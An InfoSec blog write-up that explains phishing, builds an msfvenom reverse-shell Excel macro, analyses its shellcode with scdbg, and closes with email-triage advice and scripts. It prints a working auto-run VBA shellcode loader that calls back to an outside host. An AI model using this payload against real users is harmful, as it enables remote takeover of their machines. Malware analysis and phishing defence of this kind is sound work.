Click Me and I Shall Conquer!

An Art of Fooling Humans to Steal Your Data in One Click.

Felix Alexander
InfoSec Write-ups


Have you ever heard a story about someone you know, your boss, a friend or a family member, falling for a new kind of fraud or scam, or some other unexpected trick, that ended in a devastating loss of data?

Backstory

In recent years phishing attacks have threatened not only the corporate world and the businesses in it, but increasingly individuals as well, with an attacker targeting a specific person to reach some specific, usually illicit, objective. The data and statistics on causes, factors and impacts are already spread widely around the internet. Here are some blogs that cover them:

  1. Truelist: phishing statistics in broad overview, and how the world should deal with them in the coming years
  2. Usecure: phishing trends and how they can be categorized
  3. ExpertInsights: an overall summary of phishing and the countermeasures against it

Numerous statistics put the success rate of phishing at more than 50% of cases, and this is one of the downsides of how disruptive new technology plays its role today. The big questions are: how do threat actors pull it off? Why are we convinced by their "sweet" talk? How do we end up losing our data, or having it stolen?

This write-up walks through a complete scenario of how an attacker can take advantage of our own ego to trick us and then compromise our system with ease. It does not stop there: I also break down each step and tool in detail, from a curious rather than malicious perspective, to look inside the evil medium itself, in this case an innocent-looking Word/XLS document.

Phishing, but simplified.

Before going into the analysis, it is best for readers to understand the well-known types of phishing, how to recognize a fraudulent message in both personal and business contexts, and how to mitigate them. First, the various forms of phishing in general. According to the Oxford dictionary,

Phishing is mostly known for being delivered through email, but in truth there is more to it than that.

🏹 Spear Phishing

Say you hold a grudge against a company that fired you for no reason or in an unethical way, or you want revenge on an acquaintance who treated you badly. You start planning how angry or annoyed you want them to be, or even how to cause a real loss of their assets. That whole scenario is a fair picture of spear phishing: an attack aimed at one chosen target.

This type of phishing targets a specific person or institution and, in most cases, is delivered by email with a malicious attachment. There are other delivery methods in some cases, but this scenario is the one we use for the technical part later.

🐳 Whaling

Most types of phishing are distinguished by their medium, but whaling is a special case. Whaling is the same as spear phishing, except for the target. Just as a regular fish and a whale are judged by size at first glance, a "whale" here refers to the "big boss": a senior executive in a company.

Why would an attacker go after them? Simple. Those in higher positions, or the highest one, have a much better chance of holding the permissions to do anything in the company. This gives the attacker an opportunity: by impersonating a regular colleague, they can trick the executive into doing something that benefits the attacker, such as transferring money to the attacker's own bank account.

📱 Smishing

Smishing is an abbreviation: the "Sm" stands for SMS, and you can guess the rest. This type of phishing is done via text messages. You might think it is one of the easiest to prevent, since we can usually spot a scam text directly. The interesting part is that smishing messages mostly carry a malicious link to a fake website that imitates the official one, so people still get tricked. As some say, the message is typically "too good to be true".

🎤 Vishing

Have you ever watched this YouTube video, which went viral six years ago? It is all about how a stranger can gain a personal benefit, especially sensitive personal information, over the phone. Although the technique is usually described as social engineering, it can also be called vishing (voice phishing), since the sensitive information is extracted through her voice.

📨 Email Phishing

I consider this the classic method, yet it is still very effective for delivering malicious content. Certain malware families, such as Emotet, use email for delivery and then sit dormant on the victim's device.

The Attack’s Plan via Document Attachment

We'll use the scenario from the image above. Suppose the victim has already opened the mail and downloaded the attachment. Office shows a warning that the document contains macros, but the victim, not knowing what that means, enables them without a second thought. A macro, in particular a VBA (Visual Basic for Applications) macro, is code embedded in the document that Office runs to carry out tasks through user-defined procedures; in this context it is built purely for malicious purposes.

What happens next is that the attacker gains a reverse shell: once enabled, the VBA macro opens a connection back to the attacker, who can then access the internals of the victim's OS, documents included. Below is a simple way such an attacker could build a document-based attachment with little effort, and it still works in plenty of environments today.

First, the attacker can use msfvenom, the Metasploit payload generator, which offers many payloads for penetration testing and red-team work. The command is the following:

msfvenom -p windows/shell/reverse_tcp LHOST=2.tcp.ngrok.io LPORT=11189 -f vba

The attacker tunnels the TCP listener through ngrok, so that once the macro runs the reverse shell comes back through the tunnel (the payload is a reverse TCP shell for Windows). One caveat: windows/shell/reverse_tcp is a staged payload. The VBA carries only the stager, which connects back and downloads the actual shell stage from a Metasploit handler (exploit/multi/handler), so a plain netcat listener would not give a working shell; the stageless variant windows/shell_reverse_tcp would be needed for that.

The generated malicious VBA looks like this:

' Declarations for the three kernel32 functions the loader needs. The VBA7
' branch (Office 2010 and later) uses PtrSafe/LongPtr so pointers have the
' right width on 64-bit Office; the #Else branch covers legacy VBA6.
#If Vba7 Then
Private Declare PtrSafe Function CreateThread Lib "kernel32" (ByVal Oysqscq As Long, ByVal Cnbm As Long, ByVal Axflal As LongPtr, Ajt As Long, ByVal Oeamvexov As Long, Tonmzz As Long) As LongPtr
Private Declare PtrSafe Function VirtualAlloc Lib "kernel32" (ByVal Ggmbv As Long, ByVal Gsguuiget As Long, ByVal Kibz As Long, ByVal Jnlbad As Long) As LongPtr
Private Declare PtrSafe Function RtlMoveMemory Lib "kernel32" (ByVal Jtizx As LongPtr, ByRef Jmxhlh As Any, ByVal Locy As Long) As LongPtr
#Else
Private Declare Function CreateThread Lib "kernel32" (ByVal Oysqscq As Long, ByVal Cnbm As Long, ByVal Axflal As Long, Ajt As Long, ByVal Oeamvexov As Long, Tonmzz As Long) As Long
Private Declare Function VirtualAlloc Lib "kernel32" (ByVal Ggmbv As Long, ByVal Gsguuiget As Long, ByVal Kibz As Long, ByVal Jnlbad As Long) As Long
Private Declare Function RtlMoveMemory Lib "kernel32" (ByVal Jtizx As Long, ByRef Jmxhlh As Any, ByVal Locy As Long) As Long
#EndIf

' Auto_Open runs automatically when Excel opens the workbook with macros enabled.
Sub Auto_Open()
Dim Cihdith As Long, Gbru As Variant, Grnvw As Long
#If Vba7 Then
Dim Trnptmyb As LongPtr, Vnllfh As LongPtr
#Else
Dim Trnptmyb As Long, Vnllfh As Long
#EndIf
' Gbru holds the raw x86 stager shellcode as decimal byte values.
Gbru = Array(232,143,0,0,0,96,49,210,137,229,100,139,82,48,139,82,12,139,82,20,15,183,74,38,49,255,139,114,40,49,192,172,60,97,124,2,44,32,193,207,13,1,199,73,117,239,82,139,82,16,139,66,60,1,208,87,139,64,120,133,192,116,76,1,208,139,72,24,139,88,32,80,1,211,133,201,116,60,49,255, _
73,139,52,139,1,214,49,192,172,193,207,13,1,199,56,224,117,244,3,125,248,59,125,36,117,224,88,139,88,36,1,211,102,139,12,75,139,88,28,1,211,139,4,139,1,208,137,68,36,36,91,91,97,89,90,81,255,224,88,95,90,139,18,233,128,255,255,255,93,104,51,50,0,0,104,119,115,50,95,84, _
104,76,119,38,7,137,232,255,208,184,144,1,0,0,41,196,84,80,104,41,128,107,0,255,213,106,10,104,3,128,107,74,104,2,0,43,181,137,230,80,80,80,80,64,80,64,80,104,234,15,223,224,255,213,151,106,16,86,87,104,153,165,116,97,255,213,133,192,116,10,255,78,8,117,236,232,103,0,0,0, _
106,0,106,4,86,87,104,2,217,200,95,255,213,131,248,0,126,54,139,54,106,64,104,0,16,0,0,86,106,0,104,88,164,83,229,255,213,147,83,106,0,86,83,87,104,2,217,200,95,255,213,131,248,0,125,40,88,104,0,64,0,0,106,0,80,104,11,47,15,48,255,213,87,104,117,110,77,97,255,213, _
94,94,255,12,36,15,133,112,255,255,255,233,155,255,255,255,1,195,41,198,117,193,195,187,240,181,162,86,106,0,83,255,213)

' Allocate an RWX region: MEM_COMMIT (&H1000) with PAGE_EXECUTE_READWRITE (&H40).
' UBound(Gbru) is one less than the array length, but the allocation is rounded
' up to a whole page, so the entire stager still fits.
Trnptmyb = VirtualAlloc(0, UBound(Gbru), &H1000, &H40)
' Copy the shellcode one byte at a time. Cihdith is passed ByRef, so only the
' low byte of the Long is written to the destination.
For Grnvw = LBound(Gbru) To UBound(Gbru)
Cihdith = Gbru(Grnvw)
Vnllfh = RtlMoveMemory(Trnptmyb + Grnvw, Cihdith, 1)
Next Grnvw
' Start a new thread inside the Office process with the buffer as its entry point.
Vnllfh = CreateThread(0, 0, Trnptmyb, 0, 0, 0)
End Sub
' Word fires AutoOpen and Excel fires Auto_Open / Workbook_Open; all three
' entry points lead to the same loader, so the document works in either app.
Sub AutoOpen()
Auto_Open
End Sub
Sub Workbook_Open()
Auto_Open
End Sub

What’s that code? How does it work?

What you see here is a classic shellcode injection loader written in VBA. Shellcode is simply raw machine instructions, and the byte array is exactly that: our evil reverse-shell stager encoded as decimal values. We analyze the shellcode itself in the next section.

Three well-known Win32 API functions are imported from kernel32.dll for this style of injection: VirtualAlloc, RtlMoveMemory and CreateThread.

CreateThread, as the Declare line shows, comes from kernel32.dll and does what its name says: it creates a thread that runs within the virtual address space of the calling process, here the Office process itself.

VirtualAlloc also comes from kernel32.dll and is how loaders obtain memory for injected code. In the code it takes four parameters. The first is the preferred start address (0 lets Windows choose); the second is the size in bytes, UBound(Gbru), which is one less than the array length but harmless because the allocation is rounded up to a whole page. The third and fourth parameters are what matter for executing the shellcode. The third, the allocation type, is 0x1000, MEM_COMMIT; with a NULL start address this reserves and commits the pages in a single call, as the official MSDN documentation describes.

The fourth sets the page protection to PAGE_EXECUTE_READWRITE (0x40), the same idea as an RWX mapping on Linux (PROT_READ | PROT_WRITE | PROT_EXEC). In that sense VirtualAlloc is the Windows counterpart of mmap() in C. One practical caveat: this payload is 32-bit x86 shellcode, so it only runs correctly in 32-bit Office; on 64-bit Office the loader jumps into x86 code inside a 64-bit process and the application crashes, which is why an attacker would generate a windows/x64/... payload for that target.

The last function, RtlMoveMemory, copies a buffer from a source address to a destination address, like memcpy() in C. It is called after VirtualAlloc because the destination region must exist and be writable before anything can be copied into it; the loop copies the shellcode one byte per iteration, passing the Long variable Cihdith by reference so that only its low byte lands in memory. Once the copy is complete, CreateThread is invoked with the allocated buffer as the thread's start address, and the shellcode from Gbru runs.

The attacker then opens the VBA editor in Excel, creates a new module containing the generated code above, and saves the workbook as .xlsm, the macro-enabled spreadsheet format (a plain .xlsx cannot carry macros).

The attacker also has to write a convincing email, so that the message passes as legitimate from the victim's point of view. There are many tools that help build such a phishing campaign.

Once the victim opens the document and enables macros, the attacker's handler receives the connection back and gains the shell. In practice it takes a single click on Enable Content, and the backdoor is open!

This step is not only for malicious use: a red teamer may also have to run a phishing campaign against a client's employees (for example, company A hires a red teamer from your security firm). If you think the code above is already complex enough that no end user will ever spot the malicious Excel file, you are wrong: the unmodified msfvenom output is signatured by practically every antivirus product and gets quarantined immediately. A red teamer has to work out how to get past AV and EDR, and that requires real evasion work, such as obfuscating the macro or leveraging another application to host the payload.

Analyzing the Windows Shellcode, but with minimal effort…

Background image is taken from: https://www.sentinelone.com/blog/malicious-input-how-hackers-use-shellcode/

Now that you understand how the loader executes the shellcode, some of you may still be curious how the shellcode itself is built and what it really does, in readable terms. It is possible to observe the parameters and the execution flow of this evil payload dynamically. Shellcode cannot be run with a double-click, since it is not an executable file, but there are tools that let us execute and analyze it quite simply.

#include <stdio.h>
#include <string.h>
#include <sys/mman.h>

/* Paste the raw shellcode here as a C string, e.g. "\xe8\x8f\x00..." */
unsigned char bytes[] = \
"THIS IS YOUR SHELLCODE IN BYTES";

int main(void) {
    /* Anonymous RWX mapping: the Linux equivalent of the
       VirtualAlloc(..., MEM_COMMIT, PAGE_EXECUTE_READWRITE) call in the VBA. */
    void* region = mmap(NULL,
                        sizeof(bytes),
                        PROT_READ | PROT_WRITE | PROT_EXEC,
                        MAP_ANONYMOUS | MAP_PRIVATE,
                        -1,
                        0);

    if (region == MAP_FAILED) {
        perror("mmap");
        return 1;
    }

    /* The RtlMoveMemory step. sizeof(bytes) includes the string's NUL
       terminator; copying that one extra byte is harmless. */
    memcpy(region, bytes, sizeof(bytes));

    printf("executing %zu bytes shellcode using mmap system call\n", sizeof(bytes));
    ((void (*)(void))region)();

    /* unreachable for a reverse shell: the shellcode never returns */
    munmap(region, sizeof(bytes));
    return 0;
}

To analyze Linux shellcode, we can compile the C harness above (taken from this awesome gist) and debug the resulting binary, breaking at the point where it calls into the shellcode (usually a call %register instruction).

The same approach works for Windows shellcode by rebuilding the VBA logic in C with the same Win32 API functions (or by debugging the VBA directly, preferably inside a sandboxed VM).

If we just want to run the shellcode quickly, there is a tool called scdbg, a shellcode emulator. It gives a simple picture of what happens at runtime by reporting every Win32 API function the shellcode calls, together with the arguments.

Usage is simple: all we have to do is save the shellcode to a file (preferably as raw binary, or in hexadecimal). The shellcode in question is the content of the Gbru variable.

Gbru = Array(232,143,0,0,0,96,49,210,137,229,100,139,82,48,139,82,12,139,82,20,15,183,74,38,49,255,139,114,40,49,192,172,60,97,124,2,44,32,193,207,13,1,199,73,117,239,82,139,82,16,139,66,60,1,208,87,139,64,120,133,192,116,76,1,208,139,72,24,139,88,32,80,1,211,133,201,116,60,49,255, _
73,139,52,139,1,214,49,192,172,193,207,13,1,199,56,224,117,244,3,125,248,59,125,36,117,224,88,139,88,36,1,211,102,139,12,75,139,88,28,1,211,139,4,139,1,208,137,68,36,36,91,91,97,89,90,81,255,224,88,95,90,139,18,233,128,255,255,255,93,104,51,50,0,0,104,119,115,50,95,84, _
104,76,119,38,7,137,232,255,208,184,144,1,0,0,41,196,84,80,104,41,128,107,0,255,213,106,10,104,3,128,107,74,104,2,0,43,181,137,230,80,80,80,80,64,80,64,80,104,234,15,223,224,255,213,151,106,16,86,87,104,153,165,116,97,255,213,133,192,116,10,255,78,8,117,236,232,103,0,0,0, _
106,0,106,4,86,87,104,2,217,200,95,255,213,131,248,0,126,54,139,54,106,64,104,0,16,0,0,86,106,0,104,88,164,83,229,255,213,147,83,106,0,86,83,87,104,2,217,200,95,255,213,131,248,0,125,40,88,104,0,64,0,0,106,0,80,104,11,47,15,48,255,213,87,104,117,110,77,97,255,213, _
94,94,255,12,36,15,133,112,255,255,255,233,155,255,255,255,1,195,41,198,117,193,195,187,240,181,162,86,106,0,83,255,213)

Remove the _ characters, which are only VBA line continuations, and convert the decimal values into a binary file.
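As an added example that is not part of the original post, the following Python script does the conversion and, as a bonus, reads the C2 endpoint straight out of the stager, which is what scdbg confirms in the next step. It takes the Gbru text copied from the macro above, writes the raw bytes to a file for scdbg, and then matches the fixed instruction sequence that Metasploit's x86 reverse_tcp stager uses to push the retry count, the IP address and the AF_INET/port pair onto the stack before building its sockaddr_in. The output filename, the helper names and the pattern-matching approach are my own, not the article's.

```python
"""Added example, not code from the original post: turn the msfvenom VBA byte
array into the raw .bin that scdbg reads, then recover the reverse_tcp
stager's C2 endpoint and retry count directly from the bytes."""
import ipaddress
import re
import struct
import sys
from typing import Optional

# Copied verbatim from the article's VBA module (the 353-byte x86 stager).
VBA_ARRAY = """Gbru = Array(232,143,0,0,0,96,49,210,137,229,100,139,82,48,139,82,12,139,82,20,15,183,74,38,49,255,139,114,40,49,192,172,60,97,124,2,44,32,193,207,13,1,199,73,117,239,82,139,82,16,139,66,60,1,208,87,139,64,120,133,192,116,76,1,208,139,72,24,139,88,32,80,1,211,133,201,116,60,49,255, _
73,139,52,139,1,214,49,192,172,193,207,13,1,199,56,224,117,244,3,125,248,59,125,36,117,224,88,139,88,36,1,211,102,139,12,75,139,88,28,1,211,139,4,139,1,208,137,68,36,36,91,91,97,89,90,81,255,224,88,95,90,139,18,233,128,255,255,255,93,104,51,50,0,0,104,119,115,50,95,84, _
104,76,119,38,7,137,232,255,208,184,144,1,0,0,41,196,84,80,104,41,128,107,0,255,213,106,10,104,3,128,107,74,104,2,0,43,181,137,230,80,80,80,80,64,80,64,80,104,234,15,223,224,255,213,151,106,16,86,87,104,153,165,116,97,255,213,133,192,116,10,255,78,8,117,236,232,103,0,0,0, _
106,0,106,4,86,87,104,2,217,200,95,255,213,131,248,0,126,54,139,54,106,64,104,0,16,0,0,86,106,0,104,88,164,83,229,255,213,147,83,106,0,86,83,87,104,2,217,200,95,255,213,131,248,0,125,40,88,104,0,64,0,0,106,0,80,104,11,47,15,48,255,213,87,104,117,110,77,97,255,213, _
94,94,255,12,36,15,133,112,255,255,255,233,155,255,255,255,1,195,41,198,117,193,195,187,240,181,162,86,106,0,83,255,213)"""


def vba_array_to_bytes(vba_text: str) -> bytes:
    """Parse 'Array(1,2, _\\n 3)' into bytes: drop the line-continuation
    underscores and all whitespace, then treat each decimal as one byte."""
    m = re.search(r"Array\((.*)\)", vba_text, re.DOTALL)
    if not m:
        raise ValueError("no Array(...) literal found")
    body = re.sub(r"[\s_]+", "", m.group(1))
    values = [int(tok) for tok in body.split(",") if tok]
    if any(not 0 <= v <= 255 for v in values):
        raise ValueError("array element outside 0..255")
    return bytes(values)


# Metasploit's x86 reverse_tcp stager sets up its connection like this:
#   push <retries>              6A xx
#   push <ip, network order>    68 aa bb cc dd
#   push 0x<port be><0002>      68 02 00 pp pp   (AF_INET + htons(port))
#   mov  esi, esp               89 E6
# The same fixed sequence is what lets us read the C2 out of the bytes.
STAGER_C2 = re.compile(rb"\x6a(.)\x68(.{4})\x68\x02\x00(.{2})\x89\xe6", re.DOTALL)


def find_reverse_tcp_c2(shellcode: bytes) -> Optional[dict]:
    """Return {'host', 'port', 'retries'} for a reverse_tcp stager, else None."""
    m = STAGER_C2.search(shellcode)
    if not m:
        return None
    return {
        "host": str(ipaddress.IPv4Address(m.group(2))),
        "port": struct.unpack(">H", m.group(3))[0],
        "retries": m.group(1)[0],
    }


def write_bin(shellcode: bytes, path: str) -> int:
    """Write the raw bytes for scdbg; returns the number of bytes written."""
    with open(path, "wb") as f:
        return f.write(shellcode)


if __name__ == "__main__":
    sc = vba_array_to_bytes(VBA_ARRAY)
    out = sys.argv[1] if len(sys.argv) > 1 else "baba2.vir"  # my filename choice
    print(f"wrote {write_bin(sc, out)} bytes (0x{len(sc):x}) to {out}")
    print(find_reverse_tcp_c2(sc))
```

Run it as `python3 vba2bin.py baba2.vir` and feed the file to scdbg. For this array the script reports 353 bytes (0x161) and a C2 of 3.128.107.74:11189 with a retry count of 10; both values show up again in the emulator output below, and the retry count explains why scdbg shows the connect loop as many times as it does.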

Once done, run scdbg.exe with the following flags. baba2.vir is the binary file containing the shellcode that you saved earlier.

As the output shows, the shellcode calls several Win32 API functions. Most of them come from ws2_32.dll, the DLL responsible for sockets on Windows. The shellcode makes the victim connect to 3[.]128[.]107[.]74:11189: the port is the LPORT from the msfvenom command, and the IP address is the public address of our ngrok tunnel. Note that a single default run does not necessarily list every API call, because scdbg stops after its default step budget, so later calls can remain hidden.

What if we want to see the parameters passed to every function, including the calls hidden behind the step limit? Simply set the step count explicitly. Since we do not know how many steps the shellcode needs, pass -1, which scdbg interprets as 0xffffffff, effectively unlimited.

scdbg.exe /s -1 /f baba2.vir
Loaded 161 bytes from file baba2.vir
Initialization Complete..
Max Steps: -1
Using base offset: 0x401000

4010a9 LoadLibraryA(ws2_32)
4010b9 WSAStartup(190)
4010d6 WSASocket(af=2, tp=1, proto=0, group=0, flags=0)
4010e2 connect(h=42, host: 3.128.107.74 , port: 11189 ) = 71ab4a07
4010fd recv(h=42, buf=12fc5c, len=4, fl=0)
401140 closesocket(h=42)
4010d6 WSASocket(af=2, tp=1, proto=0, group=0, flags=0)
4010e2 connect(h=42, host: 3.128.107.74 , port: 11189 ) = 71ab4a07
4010fd recv(h=42, buf=12fc5c, len=4, fl=0)
401140 closesocket(h=42)
4010d6 WSASocket(af=2, tp=1, proto=0, group=0, flags=0)
4010e2 connect(h=42, host: 3.128.107.74 , port: 11189 ) = 71ab4a07
4010fd recv(h=42, buf=12fc5c, len=4, fl=0)
401140 closesocket(h=42)
4010d6 WSASocket(af=2, tp=1, proto=0, group=0, flags=0)
4010e2 connect(h=42, host: 3.128.107.74 , port: 11189 ) = 71ab4a07
4010fd recv(h=42, buf=12fc5c, len=4, fl=0)
401140 closesocket(h=42)
4010d6 WSASocket(af=2, tp=1, proto=0, group=0, flags=0)
4010e2 connect(h=42, host: 3.128.107.74 , port: 11189 ) = 71ab4a07
4010fd recv(h=42, buf=12fc5c, len=4, fl=0)
401140 closesocket(h=42)
4010d6 WSASocket(af=2, tp=1, proto=0, group=0, flags=0)
4010e2 connect(h=42, host: 3.128.107.74 , port: 11189 ) = 71ab4a07
4010fd recv(h=42, buf=12fc5c, len=4, fl=0)
401140 closesocket(h=42)
4010d6 WSASocket(af=2, tp=1, proto=0, group=0, flags=0)
4010e2 connect(h=42, host: 3.128.107.74 , port: 11189 ) = 71ab4a07
4010fd recv(h=42, buf=12fc5c, len=4, fl=0)
401140 closesocket(h=42)
4010d6 WSASocket(af=2, tp=1, proto=0, group=0, flags=0)
4010e2 connect(h=42, host: 3.128.107.74 , port: 11189 ) = 71ab4a07
4010fd recv(h=42, buf=12fc5c, len=4, fl=0)
401140 closesocket(h=42)
4010d6 WSASocket(af=2, tp=1, proto=0, group=0, flags=0)
4010e2 connect(h=42, host: 3.128.107.74 , port: 11189 ) = 71ab4a07
4010fd recv(h=42, buf=12fc5c, len=4, fl=0)
401140 closesocket(h=42)
4010d6 WSASocket(af=2, tp=1, proto=0, group=0, flags=0)
4010e2 connect(h=42, host: 3.128.107.74 , port: 11189 ) = 71ab4a07
4010fd recv(h=42, buf=12fc5c, len=4, fl=0)
401140 closesocket(h=42)
401161 ExitProcess(0)

Stepcount 12226075

As we can see, another function is called at the very end: ExitProcess! (Two notes on reading the log: scdbg prints sizes in hexadecimal, so "Loaded 161 bytes" means 0x161 = 353 bytes, the length of the Gbru array.) The output also explains the loop. The stager pushes 10 as a retry counter (the 106,10 pair in the array is push 10), then creates a socket, connects, and tries to recv the 4-byte length of the stage it expects from the handler. In the emulator no stage ever arrives, so it closes the socket and retries, and after the tenth failure it calls ExitProcess(0). Against a live handler, the recv of those 4 bytes would be followed by a VirtualAlloc of an RWX region (the push 0x40 and push 0x1000 are visible in the bytes as 106,64 and 104,0,16,0,0) into which the real shell stage is read and executed.

Conclusion

Digitalization brings positive and negative impacts in equal measure, and this was only a small sample of what could derail your career if you are unlucky enough to get tricked once.

Here are several tips I recommend for preventing these phishing attacks, using email as the medium.

  • Check whether an unexpected message is too good to be true, contains suspicious hyperlinks (hover over them first to see the real destination), carries attachments with unusual or macro-enabled extensions, creates a sense of urgency, or comes from an unusual sender. None of these alone proves fraud, since a legitimate mail can show some of them, but phishing emails commonly share these traits.
  • Analyze the headers to check whether the email is spoofed, in particular the SPF, DKIM and DMARC results in the Authentication-Results header and whether the Return-Path and Reply-To domains match the From domain. Online tools such as mxtoolbox.com and mailheader.org can parse the headers for you.
  • If you know what you are doing, analyze the attachments yourself in a sandboxed environment.
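As an added example that is not part of the original post, the script below applies the first two tips programmatically: it reads the SPF/DKIM/DMARC verdicts from the Authentication-Results header, compares the Return-Path and Reply-To domains against the From domain, looks for urgency wording in the subject, and flags macro-capable attachments such as the .xlsm from this write-up. Both messages, the header values, the domain names and the keyword lists are constructed by me for illustration; only the Python standard library is used.

```python
"""Added example, not from the original post: header triage for an inbound
message using only the standard library. Both messages are constructed
samples, not real email."""
import email
import re
from email import policy
from email.utils import parseaddr

# Constructed sample: a malicious-macro phish like the one in this article.
SUSPICIOUS_SAMPLE = """\
Return-Path: <bounce@mail-relay.example.net>
Authentication-Results: mx.example.com;
 spf=fail smtp.mailfrom=mail-relay.example.net;
 dkim=none;
 dmarc=fail header.from=corp.example
From: "Finance Dept" <payments@corp.example>
Reply-To: payments-update@corp-invoices.example
Subject: URGENT: invoice overdue, open the attached sheet today
Content-Type: multipart/mixed; boundary="B"

--B
Content-Type: text/plain

Please open the attached sheet and click Enable Content.
--B
Content-Type: application/vnd.ms-excel.sheet.macroEnabled.12; name="invoice.xlsm"
Content-Disposition: attachment; filename="invoice.xlsm"
Content-Transfer-Encoding: base64

UEsDBA==
--B--
"""

# Constructed sample of an ordinary internal message for comparison.
CLEAN_SAMPLE = """\
Return-Path: <alice@corp.example>
Authentication-Results: mx.example.com; spf=pass smtp.mailfrom=corp.example;
 dkim=pass header.d=corp.example; dmarc=pass header.from=corp.example
From: Alice <alice@corp.example>
Subject: Lunch on Thursday?
Content-Type: text/plain

See you there.
"""

# Extensions that can carry macros or run code directly when opened (my list).
RISKY_EXT = (".xlsm", ".xls", ".docm", ".doc", ".pptm", ".js", ".vbs",
             ".hta", ".lnk", ".iso", ".img")
URGENCY = re.compile(r"\b(urgent|immediately|today|overdue|suspended)\b", re.I)
AUTH_RESULT = re.compile(r"\b(spf|dkim|dmarc)=(\w+)", re.I)


def domain_of(address_header: str) -> str:
    """'Name <user@host>' -> 'host' (empty string if there is no address)."""
    _, addr = parseaddr(address_header or "")
    return addr.rpartition("@")[2].lower()


def parse_auth_results(value: str) -> dict:
    """Pull the spf=/dkim=/dmarc= verdicts out of Authentication-Results."""
    return {k.lower(): v.lower() for k, v in AUTH_RESULT.findall(value or "")}


def triage(raw_message: str) -> dict:
    msg = email.message_from_string(raw_message, policy=policy.default)
    findings = []

    auth = parse_auth_results(str(msg.get("Authentication-Results", "")))
    for mech in ("spf", "dkim", "dmarc"):
        if auth.get(mech) != "pass":
            findings.append(f"{mech}={auth.get(mech, 'missing')}")

    # Spoofed mail often shows a From domain that the envelope sender and
    # the Reply-To do not agree with.
    from_domain = domain_of(str(msg.get("From", "")))
    for hdr in ("Return-Path", "Reply-To"):
        other = domain_of(str(msg.get(hdr, "")))
        if other and other != from_domain:
            findings.append(f"{hdr} domain {other} differs from From domain {from_domain}")

    if URGENCY.search(str(msg.get("Subject", ""))):
        findings.append("urgency language in Subject")

    risky = []
    if msg.is_multipart():
        for part in msg.iter_attachments():
            name = (part.get_filename() or "").lower()
            if name.endswith(RISKY_EXT):
                risky.append(name)
    if risky:
        findings.append("macro-capable or executable attachment: " + ", ".join(risky))

    return {"auth": auth, "from_domain": from_domain, "risky_attachments": risky,
            "findings": findings,
            "verdict": "suspicious" if findings else "looks clean"}


if __name__ == "__main__":
    for label, sample in (("phish", SUSPICIOUS_SAMPLE), ("clean", CLEAN_SAMPLE)):
        result = triage(sample)
        print(f"{label}: {result['verdict']}")
        for finding in result["findings"]:
            print("  -", finding)
```

Point `triage()` at the raw source of a message (the "show original" view in most mail clients) to get the same findings a manual header review would produce. The authentication verdicts are only as trustworthy as the gateway that wrote the Authentication-Results header, so on a real mail flow restrict the check to the header added by your own inbound MX.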

Love my content? You can support me on Trakteer/BMC 😁. Thank you for reading, and I hope you learned something new here!

https://trakteer.id/felix-alexander-swfnt/tip?open=true
